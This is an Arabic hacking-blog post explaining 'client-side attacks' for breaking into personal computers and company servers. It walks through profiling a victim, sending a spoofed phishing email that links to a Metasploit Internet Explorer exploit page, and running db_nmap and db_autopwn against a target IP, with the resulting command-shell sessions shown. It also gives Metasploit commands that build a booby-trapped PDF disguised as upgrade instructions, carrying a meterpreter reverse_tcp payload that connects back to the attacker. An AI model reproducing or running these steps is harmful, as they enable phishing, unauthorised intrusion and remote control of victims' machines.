Client Side Attacks شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق

posted by Posted by Joe2010 | | Leave a Response


إختراق أجهزة السرفرات والأجهزه العاديه
بسم الله الرحمن الرحيم
والصلاة والسلام علي أشرف المرسلين محمد إبن عبد الله النبي الأمين
وعلي امته ومن تبعه بإخلاص إلي يوم الدين

-------------------------
إختراق أجهزة السرفرات والأجهزه العاديه

كثر الحديث عن إمكانية الإختراق بالايبي فقط . . هل يمكن ذلك او لا ؟

ربما اصبح السؤال متأخر جدا في هذا الوقت لوجود مشاريع الإختراق وكثرتها وجعلها من المصادر المفتوحه

وسندرس اليوم بإن الله جآنب من عمليات الإختراق التي تهدد المستخدم العادي والغير عادي

وأقصد بالمستخدم العادي Personal Computing استخدام الكمبيوتر بشكل شخصي

والمستخدم الغير عادي أجهزة السرفرات والشركات والمؤسسات ... إلخ

والجانب الذي سندرسه اليوم هو أخطر جوانب عمليات الإختراق التي تهدد المستخدمين



حيث ان تلك العمليه تنجح بها في إختراق الضحيه بنسبة تعدو الـ 75% .. << لآ يستهان بها طبعا . Client Side Attacks

و سنقسم موضوع اليوم باذن الله كالتالي :

تعريف بالكلينت سايد أتاكس
1
Client
Side Attacks
2
بعض البرامج التي يمكن استغلالها

3- تطبيق عملي علي أحد الثغرات
------------------
بسم الله نبدأ
ما هي الـ
(Client Side Attacks)

أبدا تعريف الكلينت سايد اتاك بنفس التعريف الذي بدأ به Tim Greene عندما شرح الكلينت سايد اتاكس

إقتباسا عن معهد سانس < غني عن التعريف تلك المقوله المقتبسه عن هي :
كود PHP:
Client-side vulnerabilities are among the biggest threats facing users, the SANS Institute said
ببساطه عندما تريد إختراق ضحيه معينه سواء كان مستخدم عادي او غير عادي كما سبق التفصيل

وبطريقة ما حصلت علي الايبي الشخصي له سواء عن طريق إيهامه بدخول صفحة لتسجيل بياناته

ا ما شابه ذلك من الطرق . . المهم انت معك الان ايبي ضحيتك

لاكن لا تملك عن جهازه أي معلومات فماذا ستفعل ؟

حسنا أجد البعض يقول Nmap Scanning نفحص الايبي بتاعه بأداة nmap

حسنا وماذا اذا لم تجد بجهازه بورتات خاصه ببرامج مصابه ؟؟ ماذا لو كان ضحيتك أذكي مما تتوقع قام بحجب فحص الإن ماب

حاسس انه في واحد نذل هيقولي نستخدم برنامج فحص تاني غير الان ماب هههههههههه

معاك في دي لاكن فرضا انك لم تجد ايضا برامج مصابه فما الحل ؟

هنا يأتي دور الكلينت سايد اتاكس

وهي تعتمد أكبر الإعتماد علي تحليلك لشخصية الضحيه ويدخل بها أيضا جزء من الهندسه الإجتماعيه

يمعني ؟ بمعني انك تقوم بتخمين برنامج معين يكون الضحيه يستخدمه او يكون البرنامج منتشر علي الكثير من الاجهزه

ما عنيته بتدخل الهندسه الاجتماعيه في ذلك المجال

هو حديثك مع الضحيه ولنفرض انك عرفت بانه مطور مواقع اذا فبحسبه سريعه مطورو المواقع يحتاجون الي :

انترنت اكسبلورر وبعض برامج التصميم وبرنامج مساعد في التعديل علي الملفات وأشهرها notepad++

ومن المعروف انه برنامج النوت باد بلص بلص فيه ثغرات خطيره جدا ومنها ما تدعمه الميتا سبلويت

اذا نستخدم الثغره علي اي بي الضحيه ونحاول اختراقه وهكذا

وإنت وتخمينك

يعني دلوقت الكلينت سايد اتاك هو استهداف برنامج يستخدم بشكل أساسي وإستغلال ثغراته في اختراق الضحيه . .

2 - بعض البرامج التي يمكن استغلالها

طبعا من أشهر البرامج المستخدمه في ألاجهزه

و أشهر المصابين والمتواجدين علي اجهزة المستخدمين بشكل مبالغ فيه وهي internet explorer

notepad++ & gom player & winamp

هل رأيتم ؟ من منا لا يوجد علي جهازه علي ألاقل واحد من تلك لبرامج ؟؟

وغيرها وطبعا لم أذكر سوي البرامج المصابه بثغرات خطيره والتي اقوم بإستخدامها في أغلب الأوقات

وطبعا للحصول علي ثغرات لتلك البرامج من مشروع الميتا سبلويت لا عليكم سوي تشغيل برنامج الميتا سبلويت

ثم كتابة :
كود PHP:
search programN4me
programn4me يعني اسم البرنامج الذي تريد ان تبحث عن ثغره له وناخذ علي سبيل المثال البحث هن ثغره لبرنامج الجوم بلاير

إختراق أجهزة السرفرات والأجهزه العاديه

كما ترون بحثنا ووجدنا ثغره خطيره من نوع بفر اوفر فلو يمكن استخدامها واستغلالها ببساطه . .

وتستطيعون البحث أيضا بجوجل عن البرامج التي تتوقعون بأن الضحيه يستخدمها

3 - تطبيق عملي

وعفوا ساشرح تلك النقطه بانجاز نظرا لقلة الوقت . . لاكن ساوضح بعض التفاصيل حتي تفهموني .

بالفعل اكثر الثغرات وأشهرها وللاسف انها موجوده في معظم الاجهزه حتي أجهزة سرفرات المواقع

هي ثغرات الانترنت اكسبلورر . . . فنجد ان الكثيرين من مستخدمي الانترنت يتصفحونه عن طريق ذلك العقيم الانترنت اكسبلورر

هل تريدون أن اصرح لكم بسر صغيرإختراق أجهزة السرفرات والأجهزه العاديه << الهكر الاول في الزون اتش الهكر التركي ايسكربوتكس يستخدم الانترنت اكسبلورر إختراق أجهزة السرفرات والأجهزه العاديه وقد رايته بجهازه أثناء تصفحه لاحد الشلات الملغمه ويال الاسي هههههههه

حسنا فلنكمل . . حتي حينما تقوم بتنصيب وندوز جديد تجد عموو اكسبلورر نازل معاه غصب هههههههههه

اكيد طالما تابع لميكروسوفت

انا عن نفسي بمجرد ما انصب الوندوز أروح للبروجرام فايلز واحذفه طوالي Lolz@

تجربة اليوم ستكون علي جهاز سرفر وندوز يعني ليس مستخدم عادي ..

حسنا اذا فهو يستخدم الانترنت اكسبلورر . .

سريعا ودون تضييع للوقت ساستخدم ثغره مصاب بها الانترنت اكسبلورر وهي موجوده في الميتا سبلويت بإسم :

كود PHP:
ie_xml_corrupitaion
إختراق أجهزة السرفرات والأجهزه العاديه

حسنا من متطلبات الثغره url يعني رابط كايبي مثلا يكون ايبي ثابت يتم وضع الصفحه الناتجه من الثغره عليه

حتي ترسلها للضحيه وبمجرد دخوله اليها تقوم بإختراقه . . .

وقد استخدمت في ذلك جهاز ريموت ديسك توب لانه ايبي ثابت واقدر اتصل منه علي اي بورت

حسنا الخطوه الاولي في الاستغلال سريعا ابحث في موقع الهدف عن اميله

وجدته . . الخطوه الثانيه استخدم سكربت ميلر حتي اقدر ارسل للضحيه رساله من اي اميل اريده


الخطوه الثالثه تجهيز رساله مخادعه مع رابط لموقع عادي ويكون الهيبر لينك لها هو رابط صفحتي الملغومه .

الخطوه الرابعه أنتظر وقوع الضحيه في الفخ . .

إختراق أجهزة السرفرات والأجهزه العاديه

1 2 3 4 . . . فشل في العمليه !! لماذا ؟؟ الضحيه لم يدخل علي الرابط !!

اذا فما الحل ؟؟

وجدتها انا بحثت عن البرامج المصابه عند الضحيه ولم ابحث عن ثغرات للنظام الخاص بالضحيه !!


يمعني انني عندما قمت بفحص جهاز السرفر باداة nmap وجدت معظم البورتات مفلتره

والبورتات المفتوحه ليس لبرامجها ثغرات

لاكني نسيت ان تخمين الان ماب قال بان الضحيه يستخدم نظام وندوز sp1 والتخمين بنسبة 97 في الميه

اذا هنا سيكون اللعب سنقوم بالبحث في الميتا سبلويت عن ثغرات لنظام الوندوز من نوع sp1

وساستخدم اداة

كود PHP:
db_autopwn
حتي أستطيع تجربة اكبر عدد من الثغرات وبشكل اوتوماتيكي إختراق أجهزة السرفرات والأجهزه العاديه
حسنا نقوم بفتح الميتا سبلويت

ثم نقوم بتحميل sqlite3 بالامر :

كود PHP:
load db_sqlite3
ثم نقوم بإنشاء قاعدة بيانات جديده لاستخدامها

كود PHP:
db_create hima
ثم نستخدم الامر db_ ونستعرض الخواص الممكن استخدامها وأهمها هو :

كود PHP:
db_nmap And db_autopwn
إذا نقوم باستخدام اداة الفحص db_nmap لفحص ضحيتنا بالأمر :

كود PHP:
db_nmap 41.24.57.263
طبعا الايبي اللي انا كاتبه فوق هو أيبي وهمي إختراق أجهزة السرفرات والأجهزه العاديه

حسنا إنتهي الفحص والإن :

كود PHP:
db_autopwn -p -e -b
ولنطلق العنان للاوتوبون إختراق أجهزة السرفرات والأجهزه العاديه

بعد تجربة عدة ثغرات وجدت أن لدي 3 sessions إختراق أجهزة السرفرات والأجهزه العاديه << طبعا كوماند شل command shell
كود PHP:
msf > sessions -l

Active Sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell xx.xxx.xx.xxx:An Port -> My ip:An Port
2 Command shell xx
.xxx.xx.xxx:An Port -> My ip:An Port
3 Command shell xx
.xxx.xx.xxx:An Port -> My ip:An Port

msf
> sessions -i 2
[+] Starting interaction with 2..

Microsoft Windows XP [Version 5.1.2600]
(
C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>
-------------------------------------------------

هذا تطبيق إخر لثغره اخري علي السريع ربما يفيدكم بإذن الله :

كود PHP:
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit
(adobe_utilprintf) > set FILE**** BestComputers-UpgradeInstructions.pdf
FILE
**** => BestComputers-UpgradeInstructions.pdf
msf exploit
(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD
=> windows/meterpreter/reverse_tcp
msf exploit
(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST
=> 192.168.8.128
msf exploit
(adobe_utilprintf) > set LPORT 4455
LPORT
=> 4455
msf exploit
(adobe_utilprintf) > show options

Module options
:

****
Current Setting Required Description
---- --------------- -------- -----------
FILE**** BestComputers-UpgradeInstructions.pdf yes The file ****.
OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The ******** of the file.


Payload options (windows/meterpreter/reverse_tcp):

****
Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.8.128 yes The local address
LPORT 4455 yes The local port


Exploit target
:

Id ****
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)

msf > exploit(adobe_utilprintf) > exploit
-----------------------------------------------------

إلي هني ينتهي موضوع اليوم وأرجو أن أكون وفقت في الشرح والتوضيح وآسف علي التقصير

وهذا كان تعريفي وشرحي لهجمات Client Side Attacks وبعض الطرق المستخدمه في استغلال تلك الهجمات

أما تعريف معهد سانس لذلك النوع من الهجمات فيتلخص في :

كود PHP:
Attackers are going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients
ملحوظه : من لديه المزيد من المعلومات عن ذلك النوع فليتفضل بالطرح والتوضيح حتي تتسع دائرة المعرفه

وبالختام لا يسعني المقام سوي التوجه بالشكر إلي :

SANS Institute & Tim Greene & Dr.X.D14BL0 & x@Injector

Sinratix & Dr.Hacker & Mohandko & Providor & HcJ & ExH

وإلي جميع أصدقائي دون إستثناء

ولا أرجو منكم سوي الدعاء لي ولوالداي بما تجود به أنفسكم . وجزاكم الله خيرا .

اللهم إغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات

إنك يا ربنا سميع مجيب الدعوات . وصلي الله وسلم علي سيدنا محمد وعلي آله وصحبه أجمعين.

أخوكم إبرآهيمـ
ViRuS_HimA.
Source : Hell-Z0NE



0 Responses to 'Client Side Attacks شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق'

Post a Comment

If you have any Problem (any link dont work...) contact us :

 
Free directory submissions
>: Blog directory Computers blogs Blog Directory & Search engine Computer Security Blogs - BlogCatalog Blog Directory Yoomp blog search directory
Click here to Vote! Hacker TopsitesClick

رشحنا في دليل المواقع العربية دليل المواقع المغرب بلس رشحنا في AlamNew links - دليل عالم نيو رشحنا في دليل مواقع لايف نت